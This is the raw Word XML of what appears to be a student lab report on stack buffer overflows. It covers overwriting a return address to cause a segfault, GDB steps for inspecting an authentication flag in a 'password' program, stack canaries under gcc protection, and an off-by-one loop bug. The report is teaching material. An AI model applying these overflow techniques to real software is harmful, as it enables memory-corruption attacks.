        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Return Address</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Overflowing 24 bytes (overwriting buffer + flag + EBP) don’t produce a segfault. But as soon as we overwrite the 25th bytes (return address), it produce a segfault.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F26B22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mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" distT="0" distB="0" distL="0" distR="0">
                <wp:extent cx="5940425" cy="42073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3457" name=""/>
                        <pic:cNvPicPr>
                          <a:picLocks noChangeAspect="1"/>
                        </pic:cNvPicPr>
                        <pic:nvPr/>
                      </pic:nvPicPr>
                      <pic:blipFill rotWithShape="1">
                        <a:blip r:embed="rId17"/>
                        <a:stretch/>
                      </pic:blipFill>
                      <pic:spPr bwMode="auto">
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5940424" cy="420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3.1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p>
    <w:p w14:paraId="105003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p>
    <w:p w14:paraId="15C5FF5E">
      <w:pPr>
        <w:pStyle w:val="834"/>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr>
          <w:highlight w:val="none"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Exercise with GDB</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w14:paraId="21E309D5">
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">(I compile with -g because I’m a noob)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E6E699F">
      <w:pPr>
        <w:pStyle w:val="896"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Launch GDB with the compiled binary</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w14:paraId="36104F3C">
      <w:pPr>
        <w:pStyle w:val="896"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">gdb ./password</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p w14:paraId="397767F1">
      <w:pPr>
        <w:pStyle w:val="896"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Optional, show code :</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p w14:paraId="1085B40B">
      <w:pPr>
        <w:pStyle w:val="896"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">layout next</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r/>
    </w:p>
    <w:p w14:paraId="7B33A68F">
      <w:pPr>
        <w:pStyle w:val="896"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Set a Breakpoint and Run</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> :</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C486C60">
      <w:pPr>
        <w:pStyle w:val="896"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">(gdb) break check_authentification</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p w14:paraId="1F0F8D0D">
      <w:pPr>
        <w:pStyle w:val="896"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">(gdb) run AAAAAAAAAAAAAAAAAAAA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r/>
    </w:p>
    <w:p w14:paraId="25869918">
      <w:pPr>
        <w:pStyle w:val="896"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">ask GDB where our variables live in memory</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> :</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w14:paraId="73CD32CA">
      <w:pPr>
        <w:pStyle w:val="896"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">(gdb) print &amp;password_buffer</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p w14:paraId="5BF00D17">
      <w:pPr>
        <w:pStyle w:val="896"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">(gdb) print &amp;auth_flag</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r/>
    </w:p>
    <w:p w14:paraId="4F80B4C0">
      <w:pPr>
        <w:pStyle w:val="896"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Step through the code</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> command to execute the code line-by-line :</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r/>
    </w:p>
    <w:p w14:paraId="3D2DE4E2">
      <w:pPr>
        <w:pStyle w:val="896"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">(gdb) next</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w14:paraId="26299CCD">
      <w:pPr>
        <w:pStyle w:val="896"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> look at the actual memory of auth_flag using the x (examine)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">e</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">X</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">amine </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> block of he</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">X</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">adecimal </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">W</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">ords at the address of auth_flag</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C5F6844">
      <w:pPr>
        <w:pStyle w:val="896"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">(gdb) x/1xw &amp;auth_flag</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w14:paraId="44DCCB98">
      <w:pPr>
        <w:pStyle w:val="896"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">let the program finish and see the result, type:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w14:paraId="20256E1A">
      <w:pPr>
        <w:pStyle w:val="896"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">(gdb) continue</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A345C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14:ligatures w14:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ABF772F">
      <w:pPr>
        <w:pBdr/>
        <w:shd w:val="nil" w:color="auto"/>
        <w:spacing/>
        <w:ind/>
        <w:rPr>
          <w:highlight w:val="none"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:br w:type="page" w:clear="all"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B1DB56C">
      <w:pPr>
        <w:pStyle w:val="833"/>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr>
          <w:highlight w:val="none"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">3 Buffer Overflow Minor Variations</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DFD51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93747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8746" name=""/>
                        <pic:cNvPicPr>
                          <a:picLocks noChangeAspect="1"/>
                        </pic:cNvPicPr>
                        <pic:nvPr/>
                      </pic:nvPicPr>
                      <pic:blipFill rotWithShape="1">
                        <a:blip r:embed="rId18"/>
                        <a:stretch/>
                      </pic:blipFill>
                      <pic:spPr bwMode="auto">
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5940424" cy="19374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52.5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p>
    <w:p w14:paraId="78ECD90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60321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10576" name=""/>
                        <pic:cNvPicPr>
                          <a:picLocks noChangeAspect="1"/>
                        </pic:cNvPicPr>
                        <pic:nvPr/>
                      </pic:nvPicPr>
                      <pic:blipFill rotWithShape="1">
                        <a:blip r:embed="rId19"/>
                        <a:stretch/>
                      </pic:blipFill>
                      <pic:spPr bwMode="auto">
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5940424" cy="6032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47.5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p>
    <w:p w14:paraId="54C3429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4213043" cy="248638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22351" name=""/>
                        <pic:cNvPicPr>
                          <a:picLocks noChangeAspect="1"/>
                        </pic:cNvPicPr>
                        <pic:nvPr/>
                      </pic:nvPicPr>
                      <pic:blipFill rotWithShape="1">
                        <a:blip r:embed="rId20"/>
                        <a:stretch/>
                      </pic:blipFill>
                      <pic:spPr bwMode="auto">
                        <a:xfrm flipH="0" flipV="0">
                          <a:off x="0" y="0"/>
                          <a:ext cx="4213043" cy="2486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1.74pt;height:195.78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p>
    <w:p w14:paraId="15D46A9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92416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02598" name=""/>
                        <pic:cNvPicPr>
                          <a:picLocks noChangeAspect="1"/>
                        </pic:cNvPicPr>
                        <pic:nvPr/>
                      </pic:nvPicPr>
                      <pic:blipFill rotWithShape="1">
                        <a:blip r:embed="rId21"/>
                        <a:stretch/>
                      </pic:blipFill>
                      <pic:spPr bwMode="auto">
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5940424" cy="1924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151.51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p>
    <w:p w14:paraId="6130F76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This code may or may not also have the same vulnerability, test on your system and with your compiler(s) to see what happens. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Note that you may experience different results with different compilers</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">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D4CF4C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4FC4E3C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72FDEDA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t xml:space="preserve">I compiled the password.c with gcc and stack protection enabled. I ran the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> program with argument “ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">‘B’ + ‘A’ repeated 14 times + ‘C’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> ”.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3DE9A45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t xml:space="preserve">We can see the aw</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">full little-endian format where the first byte is at the last position... However here the flag is BEFORE the buffer, the flag is at a lower mem location than the buffer. Therefore we can not overwrite into it ! (bc we overwrite frow low mem to high mem). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="ed7d31" w:themeColor="accent2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Right after 0x43414141 (the last 4bytes of the buffer), we can see 0x9ad02a00. This is likely the canary wich starts with a 00 to prevent reading further.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">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55B534D0">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:left w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:bottom w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:right w:val="none" w:color="000000" w:sz="4" w:space="0"/>
        </w:pBdr>
        <w:spacing/>
        <w:ind w:right="0" w:firstLine="0" w:left="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:highlight w: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01048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51239" name=""/>
                        <pic:cNvPicPr>
                          <a:picLocks noChangeAspect="1"/>
                        </pic:cNvPicPr>
                        <pic:nvPr/>
                      </pic:nvPicPr>
                      <pic:blipFill rotWithShape="1">
                        <a:blip r:embed="rId22"/>
                        <a:stretch/>
                      </pic:blipFill>
                      <pic:spPr bwMode="auto">
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5940424" cy="10104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79.57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color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w14:paraId="40EAE18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r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="none"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w14:paraId="42E8F45E">
      <w:pPr>
        <w:pBdr/>
        <w:shd w:val="nil" w:color="auto"/>
        <w:spacing/>
        <w:ind/>
        <w:rPr>
          <w:highlight w:val="none"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:br w:type="page" w:clear="all"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F132FC3">
      <w:pPr>
        <w:pStyle w:val="833"/>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr>
          <w:highlight w:val="none"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">4 Infinite Loop by Overflow</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FAD17D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t xml:space="preserve">The code in "simple-loop.c" has a function that copies from an argument into a buffer. However, the bounds checking for the copy has an off-by-one error allowing an extra byte to be copied. This can cause an infinite loop for some compilers.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Experiment with the argument to create the infinite loop.</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40E41AD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2724573" cy="211603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72934" name=""/>
                        <pic:cNvPicPr>
                          <a:picLocks noChangeAspect="1"/>
                        </pic:cNvPicPr>
                        <pic:nvPr/>
                      </pic:nvPicPr>
                      <pic:blipFill rotWithShape="1">
                        <a:blip r:embed="rId23"/>
                        <a:stretch/>
                      </pic:blipFill>
                      <pic:spPr bwMode="auto">
                        <a:xfrm flipH="0" flipV="0">
                          <a:off x="0" y="0"/>
                          <a:ext cx="2724572" cy="21160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14.53pt;height:166.62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59022B4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47430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3498" name=""/>
                        <pic:cNvPicPr>
                          <a:picLocks noChangeAspect="1"/>
                        </pic:cNvPicPr>
                        <pic:nvPr/>
                      </pic:nvPicPr>
                      <pic:blipFill rotWithShape="1">
                        <a:blip r:embed="rId24"/>
                        <a:stretch/>
                      </pic:blipFill>
                      <pic:spPr bwMode="auto">
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5940424" cy="474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37.35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36ACC6D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18164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89761" name=""/>
                        <pic:cNvPicPr>
                          <a:picLocks noChangeAspect="1"/>
                        </pic:cNvPicPr>
                        <pic:nvPr/>
                      </pic:nvPicPr>
                      <pic:blipFill rotWithShape="1">
                        <a:blip r:embed="rId25"/>
                        <a:stretch/>
                      </pic:blipFill>
                      <pic:spPr bwMode="auto">
                        <a:xfrm>
                          <a:off x="0" y="0"/>
